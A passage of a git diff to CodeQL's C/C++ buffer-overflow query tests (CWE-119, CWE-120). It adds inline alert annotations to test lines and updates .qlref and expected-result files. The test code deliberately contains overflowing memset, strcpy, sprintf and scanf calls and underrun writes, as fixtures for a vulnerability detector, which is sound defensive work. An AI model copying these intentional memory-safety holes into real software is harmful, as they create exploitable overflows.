offsetof(FourUInts, inner)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.inner.c, 0, sizeof(S2) - offsetof(S2, u)); // GOOD memset(&f.inner, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // GOOD @@ -864,12 +864,12 @@ struct S2 { memset(&f.inner, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f.inner, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD - memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] memset(&f.x, 0, sizeof(S2) - offsetof(FourUInts, x)); // GOOD - memset(&f.x, 0, sizeof(S2) - offsetof(S2, f)); // GOOD + memset(&f.x, 0, sizeof(S2) - offsetof(S2, f)); // GOOD // $ Alert[cpp/overflow-buffer] memset(&f.x, 0, sizeof(S2) - offsetof(S2, u)); // GOOD memset(&f, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // GOOD @@ -880,12 +880,12 @@ struct S2 { memset(&f, 0, sizeof(S2) - offsetof(S2, f)); // GOOD memset(&f, 0, sizeof(S2) - offsetof(S2, u)); // GOOD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(FourUInts, x)); // BAD - memset(&u, 0, sizeof(S2) - offsetof(S2, f)); // BAD + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, a)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, b)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(ThreeUInts, c)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(FourUInts, inner)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(FourUInts, x)); // BAD // $ Alert[cpp/overflow-buffer] + memset(&u, 0, sizeof(S2) - offsetof(S2, f)); // BAD // $ Alert[cpp/overflow-buffer] memset(&u, 0, sizeof(S2) - offsetof(S2, u)); // GOOD } }; @@ -981,24 +981,24 @@ void test28() { int arr[10]; int *ptr1 = arr; - ptr1[-1] = 0; // BAD: underrun write + ptr1[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] ptr1++; ptr1[-1] = 0; // GOOD int *ptr2 = arr; - ptr2[-1] = 0; // BAD: underrun write + ptr2[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] *ptr2++; ptr2[-1] = 0; // GOOD int *ptr3 = arr; - ptr3[-1] = 0; // BAD: underrun write + ptr3[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] if (cond()) { ptr3++; } ptr3[-1] = 0; // GOOD (depending what cond() does) int *ptr4 = arr; - ptr4[-1] = 0; // BAD: underrun write + ptr4[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] while (true) { ptr4++; if (cond()) break; @@ -1006,7 +1006,7 @@ void test28() { ptr4[-1] = 0; // GOOD int *ptr5 = arr; - ptr5[-1] = 0; // BAD: underrun write + ptr5[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] while (true) { if (cond()) ptr5++; if (cond()) break; @@ -1028,7 +1028,7 @@ void test29() { memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2)); // GOOD (overwrites arr1, arr2) memset(&(ptr->arr1[0]), 0, sizeof(ptr->arr1) + sizeof(ptr->arr2)); // GOOD (overwrites arr1, arr2) - memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2) + 10); // BAD + memset(ptr->arr1, 0, sizeof(ptr->arr1) + sizeof(ptr->arr2) + 10); // BAD // $ Alert[cpp/overflow-buffer] } struct UnionStruct { @@ -1047,14 +1047,14 @@ void test30() { UnionStruct us; memset(us.buffer1, 0, sizeof(us.buffer1)); // GOOD - memset(us.buffer1, 0, sizeof(us)); // BAD + memset(us.buffer1, 0, sizeof(us)); // BAD // $ Alert[cpp/overflow-buffer] memset(us.buffer2, 0, sizeof(us.buffer2)); // GOOD - memset(us.buffer2, 0, sizeof(us)); // BAD + memset(us.buffer2, 0, sizeof(us)); // BAD // $ Alert[cpp/overflow-buffer] strncpy(us.buffer1, "", sizeof(us.buffer1) - 1); // GOOD - strncpy(us.buffer1, "", sizeof(us) - 1); // BAD + strncpy(us.buffer1, "", sizeof(us) - 1); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] strncpy(us.buffer2, "", sizeof(us.buffer2) - 1); // GOOD - strncpy(us.buffer2, "", sizeof(us) - 1); // BAD + strncpy(us.buffer2, "", sizeof(us) - 1); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } struct S_Size16 { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c index 96a5571bf657..a081e77a7848 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests_restrict.c @@ -9,7 +9,7 @@ char smallbuf[1], largebuf[2]; void test1() { memcpy(largebuf, smallbuf, 1); // GOOD - memcpy(largebuf, smallbuf, 2); // BAD: source over-read + memcpy(largebuf, smallbuf, 2); // BAD: source over-read // $ Alert[cpp/overflow-buffer] } int tests_restrict_main(int argc, char *argv[]) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp index bac7abb5187c..dc1e17d89794 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/unions.cpp @@ -23,15 +23,15 @@ void myUnionTest() memset(&mu, 0, sizeof(mu)); memset(&mu, 0, sizeof(mu.small)); memset(&mu, 0, sizeof(mu.large)); - memset(&mu, 0, 200); // BAD + memset(&mu, 0, 200); // BAD // $ Alert[cpp/overflow-buffer] memset(&(mu.small), 0, sizeof(mu)); // (dubious) memset(&(mu.small), 0, sizeof(mu.small)); memset(&(mu.small), 0, sizeof(mu.large)); // (dubious) - memset(&(mu.small), 0, 200); // BAD + memset(&(mu.small), 0, 200); // BAD // $ Alert[cpp/overflow-buffer] memset(&(mu.large), 0, sizeof(mu)); memset(&(mu.large), 0, sizeof(mu.small)); // (dubious) memset(&(mu.large), 0, sizeof(mu.large)); - memset(&(mu.large), 0, 200); // BAD + memset(&(mu.large), 0, 200); // BAD // $ Alert[cpp/overflow-buffer] } // --- diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp index d4fe3da48bd9..48af54182021 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/var_size_struct.cpp @@ -68,9 +68,9 @@ void testVarStruct1() { vs1->amount = 1024; memset(vs1->data, 0, 1024); // GOOD - memset(vs1->data, 0, 1025); // BAD: buffer overflow + memset(vs1->data, 0, 1025); // BAD: buffer overflow // $ Alert[cpp/overflow-buffer] strncpy(vs1->data, "Hello, world!", 1024); // GOOD - strncpy(vs1->data, "Hello, world!", 1025); // BAD + strncpy(vs1->data, "Hello, world!", 1025); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] } struct varStruct2 { @@ -84,7 +84,7 @@ void testVarStruct2() { vs2->size = 16; vs2->elements[15] = 0; // GOOD - vs2->elements[16] = 0; // BAD: buffer overflow + vs2->elements[16] = 0; // BAD: buffer overflow // $ Alert[cpp/overflow-buffer] } struct notVarStruct1 { @@ -96,11 +96,11 @@ void testNotVarStruct1() { notVarStruct1 *nvs1 = (notVarStruct1 *)malloc(sizeof(notVarStruct1) * 2); memset(nvs1->str, 0, 128); // GOOD - memset(nvs1->str, 0, 129); // DUBIOUS: buffer overflow (overflows nvs1->str but not nvs1 overall) + memset(nvs1->str, 0, 129); // DUBIOUS: buffer overflow (overflows nvs1->str but not nvs1 overall) // $ Alert[cpp/overflow-buffer] memset(nvs1[1].str, 0, 128); // GOOD memset(nvs1[1].str, 0, 129); // BAD: buffer overflow [NOT DETECTED] strncpy(nvs1->str, "Hello, world!", 128); // GOOD - strncpy(nvs1->str, "Hello, world!", 129); // BAD + strncpy(nvs1->str, "Hello, world!", 129); // BAD // $ Alert[cpp/badly-bounded-write] Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } struct notVarStruct2 { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref index 9790cddebab5..7f1a1cf35f2d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +query: Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c index c670533f9aff..cf3edad43db1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/UnsafeUseOfStrcat/test.c @@ -17,7 +17,7 @@ void free(void *ptr); static void bad0(char *s) { char buf[80]; strcpy(buf, "s: "); - strcat(buf, s); // BAD -- s may be too long and overflow the buffer + strcat(buf, s); // BAD -- s may be too long and overflow the buffer // $ Alert } static void good0(char *s) { @@ -30,7 +30,7 @@ static void good0(char *s) { static void bad1(char *s, int len) { char *buf = malloc(len+4); strcpy(buf, "s: "); - strcat(buf, s); // BAD -- s may be too long and overflow the buffer + strcat(buf, s); // BAD -- s may be too long and overflow the buffer // $ Alert } static void good1(char *s, int len) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref index f6c962c1a7b4..18ae0f2a567b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref index 757d1592e830..ba8f6a96a1fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/OverrunWriteFloat.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWriteFloat.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWriteFloat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected index 0ebcbb8cde4e..b4834cc6dc70 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.expected @@ -1,3 +1,9 @@ +#select +| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | +| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | +| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | +| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | edges | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | provenance | | | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | provenance | | @@ -10,9 +16,3 @@ nodes | tests.c:33:21:33:29 | scanf output argument | semmle.label | scanf output argument | | tests.c:34:10:34:16 | *access to array | semmle.label | *access to array | subpaths -#select -| tests.c:28:3:28:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:28:22:28:28 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:29:3:29:9 | call to sprintf | tests.c:16:26:16:29 | **argv | tests.c:29:28:29:34 | *access to array | This 'call to sprintf' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | -| tests.c:31:15:31:23 | buffer100 | tests.c:31:15:31:23 | scanf output argument | tests.c:31:15:31:23 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:31:15:31:23 | scanf output argument | value read by scanf | -| tests.c:33:21:33:29 | buffer100 | tests.c:33:21:33:29 | scanf output argument | tests.c:33:21:33:29 | scanf output argument | This 'scanf string argument' with input from $@ may overflow the destination. | tests.c:33:21:33:29 | scanf output argument | value read by scanf | -| tests.c:34:25:34:33 | buffer100 | tests.c:16:26:16:29 | **argv | tests.c:34:10:34:16 | *access to array | This 'sscanf string argument' with input from $@ may overflow the destination. | tests.c:16:26:16:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/UnboundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c index 5d37ff374ba3..3919367d26a4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests.c @@ -13,7 +13,7 @@ int sscanf(const char *s, const char *format, ...); //// Test code ///// -int main(int argc, char *argv[]) +int main(int argc, char *argv[]) // $ Source[cpp/unbounded-write] { if (argc < 1) { @@ -25,13 +25,13 @@ int main(int argc, char *argv[]) char buffer100[100]; int i; - sprintf(buffer100, argv[0]); // BAD: argv[0] could be more than 100 characters - sprintf(buffer100, "%s", argv[0]); // BAD: argv[0] could be more than 100 characters + sprintf(buffer100, argv[0]); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] + sprintf(buffer100, "%s", argv[0]); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] - scanf("%s", buffer100); // BAD: the input could be more than 100 characters + scanf("%s", buffer100); // BAD: the input could be more than 100 characters // $ Alert[cpp/unbounded-write] scanf("%i", i); // GOOD: no problems with non-strings - scanf("%i %s", i, buffer100); // BAD: second format parameter may overflow - sscanf(argv[0], "%s", buffer100); // BAD: argv[0] could be more than 100 characters + scanf("%i %s", i, buffer100); // BAD: second format parameter may overflow // $ Alert[cpp/unbounded-write] + sscanf(argv[0], "%s", buffer100); // BAD: argv[0] could be more than 100 characters // $ Alert[cpp/unbounded-write] } // Test cases for BadlyBoundedWrite.ql @@ -40,10 +40,10 @@ int main(int argc, char *argv[]) snprintf(buffer110, 109, argv[0]); // GOOD snprintf(buffer110, 110, argv[0]); // GOOD - snprintf(buffer110, 111, argv[0]); // BAD: this could still overrun the 110 character buffer + snprintf(buffer110, 111, argv[0]); // BAD: this could still overrun the 110 character buffer // $ Alert[cpp/badly-bounded-write] snprintf(buffer110, 109, "%s", argv[0]); // GOOD snprintf(buffer110, 110, "%s", argv[0]); // GOOD - snprintf(buffer110, 111, "%s", argv[0]); // BAD: this could still overrun the 110 character buffer + snprintf(buffer110, 111, "%s", argv[0]); // BAD: this could still overrun the 110 character buffer // $ Alert[cpp/badly-bounded-write] } // Test cases for OverrunWrite.ql @@ -51,16 +51,16 @@ int main(int argc, char *argv[]) char buffer10[10]; sprintf(buffer10, "123456789"); // GOOD - sprintf(buffer10, "1234567890"); // BAD: the null terminator of this string overruns the buffer + sprintf(buffer10, "1234567890"); // BAD: the null terminator of this string overruns the buffer // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer10, "%.9s", "123456789"); // GOOD sprintf(buffer10, "%.9s", "1234567890"); // GOOD sprintf(buffer10, "%.10s", "123456789"); // GOOD - sprintf(buffer10, "%.10s", "1234567890"); // BAD: the precision specified is too large for this buffer + sprintf(buffer10, "%.10s", "1234567890"); // BAD: the precision specified is too large for this buffer // $ Alert[cpp/very-likely-overrunning-write] scanf("%8s", buffer10); // GOOD: restricted to 8 characters + null scanf("%9s", buffer10); // GOOD: restricted to 9 characters + null - scanf("%10s", buffer10); // BAD: null can overflow - scanf("%11s", buffer10); // BAD: string can overflow + scanf("%10s", buffer10); // BAD: null can overflow // $ Alert[cpp/very-likely-overrunning-write] + scanf("%11s", buffer10); // BAD: string can overflow // $ Alert[cpp/very-likely-overrunning-write] } // More complex tests for OverrunWrite.ql @@ -83,14 +83,14 @@ int main(int argc, char *argv[]) { str35 = "12345"; } - strcpy(buffer5, str35); // BAD: if str35 is "12345", it overflows the buffer + strcpy(buffer5, str35); // BAD: if str35 is "12345", it overflows the buffer // $ Alert[cpp/very-likely-overrunning-write] str35 = "abc"; strcpy(buffer5, str35); // GOOD: str35 is guaranteed to fit now strcpy(buffer5, (argc == 2) ? "1234" : "abcd"); // GOOD: both of the strings fit - strcpy(buffer5, (argc == 2) ? "1234" : "abcde"); // BAD: "abcde" overflows the buffer + strcpy(buffer5, (argc == 2) ? "1234" : "abcde"); // BAD: "abcde" overflows the buffer // $ Alert[cpp/very-likely-overrunning-write] } // Test cases for OverrunWriteFloat.ql @@ -100,9 +100,9 @@ int main(int argc, char *argv[]) double bigval = 1e304; sprintf(buffer256, "%e", bigval); // GOOD - sprintf(buffer256, "%f", bigval); // BAD: this %f representation may need more than 256 characters + sprintf(buffer256, "%f", bigval); // BAD: this %f representation may need more than 256 characters // $ Alert[cpp/overrunning-write-with-float] sprintf(buffer256, "%g", bigval); // GOOD - sprintf(buffer256, "%e%f%g", bigval, bigval, bigval); // BAD: the %f representation may need more than 256 characters + sprintf(buffer256, "%e%f%g", bigval, bigval, bigval); // BAD: the %f representation may need more than 256 characters // $ Alert[cpp/overrunning-write-with-float] // GOOD: a 999 character buffer is sufficient in all of these cases sprintf(buffer999, "%e", bigval); // GOOD @@ -117,8 +117,8 @@ int main(int argc, char *argv[]) char buffer16[16]; char buffer17[17]; char buffer49[49]; - sprintf(buffer1, "%p", argv); // BAD - sprintf(buffer16, "%p", argv); // BAD + sprintf(buffer1, "%p", argv); // BAD // $ Alert[cpp/very-likely-overrunning-write] + sprintf(buffer16, "%p", argv); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer17, "%p", argv); // GOOD sprintf(buffer49, "%p and then a few more words", argv); // GOOD } @@ -133,7 +133,7 @@ void test_fn2() MyCharArray myBuffer10; sprintf(myBuffer10, "%s", "123456789"); // GOOD - sprintf(myBuffer10, "%s", "1234567890"); // BAD: buffer overflow + sprintf(myBuffer10, "%s", "1234567890"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } // --- @@ -183,10 +183,10 @@ void tesHexBounds(int x) { } if (x < 16) { - sprintf(buffer2, "%x", x); // BAD: negative values + sprintf(buffer2, "%x", x); // BAD: negative values // $ Alert[cpp/very-likely-overrunning-write] } if (x <= 16 && x > 0) { - sprintf(buffer2, "%x", x); // BAD: bound too loose + sprintf(buffer2, "%x", x); // BAD: bound too loose // $ Alert[cpp/very-likely-overrunning-write] } if(x < 0x10000 && x > 0) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp index c492e11f0b89..4be5107a6a0d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp @@ -15,36 +15,36 @@ void tests2() { buffer = (wchar_t *)malloc(2 * sizeof(wchar_t)); wcscpy(buffer, L"1"); // GOOD - wcscpy(buffer, L"12"); // BAD: buffer overflow + wcscpy(buffer, L"12"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)malloc(3 * sizeof(wchar_t)); wcscpy(buffer, L"12"); // GOOD - wcscpy(buffer, L"123"); // BAD: buffer overflow + wcscpy(buffer, L"123"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)realloc(0, 4 * sizeof(wchar_t)); wcscpy(buffer, L"123"); // GOOD - wcscpy(buffer, L"1234"); // BAD: buffer overflow + wcscpy(buffer, L"1234"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] buffer = (wchar_t *)realloc(buffer, 5 * sizeof(wchar_t)); wcscpy(buffer, L"1234"); // GOOD - wcscpy(buffer, L"12345"); // BAD: buffer overflow + wcscpy(buffer, L"12345"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)calloc(6, sizeof(wchar_t)); wcscpy(buffer, L"12345"); // GOOD - wcscpy(buffer, L"123456"); // BAD: buffer overflow + wcscpy(buffer, L"123456"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)calloc(sizeof(wchar_t), 7); wcscpy(buffer, L"123456"); // GOOD - wcscpy(buffer, L"1234567"); // BAD: buffer overflow + wcscpy(buffer, L"1234567"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = new wchar_t[8]; wcscpy(buffer, L"1234567"); // GOOD - wcscpy(buffer, L"12345678"); // BAD: buffer overflow + wcscpy(buffer, L"12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] delete [] buffer; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c index 68c9aff9c2b5..6d0f0f8ca9d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c @@ -23,8 +23,8 @@ void unions_test(MyUnion *mu) strcpy(&(mu->ptr), "1234567890"); // GOOD (dubious) strcpy(&(mu->buffer), "1234567890"); // GOOD strcpy(mu, "12345678901234567890"); // BAD [NOT DETECTED] - strcpy(&(mu->ptr), "12345678901234567890"); // BAD - strcpy(&(mu->buffer), "12345678901234567890"); // BAD + strcpy(&(mu->ptr), "12345678901234567890"); // BAD // $ Alert[cpp/very-likely-overrunning-write] + strcpy(&(mu->buffer), "12345678901234567890"); // BAD // $ Alert[cpp/very-likely-overrunning-write] mu->ptr = buffer; strcpy(mu->ptr, "1234567890"); // GOOD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp index 56036aa76ac7..2a35ada2f232 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp @@ -19,5 +19,5 @@ void testVarStruct() { vs->size = 9; strcpy(vs->data, "12345678"); // GOOD - strcpy(vs->data, "123456789"); // BAD: buffer overflow + strcpy(vs->data, "123456789"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c index c4eed5068e5f..c01abbfbaa77 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c @@ -12,16 +12,16 @@ void testMyVarStruct() MyVarStruct *ptr1 = (MyVarStruct*)malloc(sizeof(MyVarStruct)); ptr1->len = 0; strcpy(ptr1->buffer, ""); // GOOD - strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 + strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... MyVarStruct *ptr2 = (MyVarStruct*)malloc(sizeof(MyVarStruct) + (sizeof(char) * 10)); ptr2->len = 10; strcpy(ptr2->buffer, "123456789"); // GOOD strcpy(ptr2->buffer, "1234567890"); // 